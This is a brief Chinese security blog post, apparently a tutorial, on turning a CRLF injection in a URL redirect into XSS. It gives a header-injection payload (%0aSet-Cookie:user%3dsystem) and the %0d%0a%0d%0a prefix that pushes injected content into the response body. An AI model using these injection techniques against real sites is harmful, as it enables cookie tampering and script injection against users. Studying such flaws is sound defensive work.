Assassins 小白

Assassins 小白


  • About

  • Archives

  • Search

CRLF漏洞->URL跳转变XSS

Posted on 2022-04-20

人一定要忠于自己年轻时的梦想


URL跳转漏洞

Assassins小白

测试CRLF,前面加一个 %a 会解析为header头

payload: %0aSet-Cookie:user%3dsystem

Assassins小白

浏览器Response Headers:

Assassins小白

前面加上 %0a%0d%0a%0d 或者 %0d%0a%0d%0a 后面的内容会解析为body体

Assassins小白

插入XSS Payload测试

Assassins小白

# XSS # CRLF # URL跳转
夜神模拟器安装APP桌面停止运行解决方法
PHP常见魔术方法

48 posts
98 tags
挚爱亲朋
  • Se7en的博客
  • Lego的博客
  • Picnic的博客
  • 一灯和尚的博客
© 2019 — 2023 Assassins 小白
Powered by 小白
|   行善的最高境界不是施舍,而是引路                                        本站访问人数: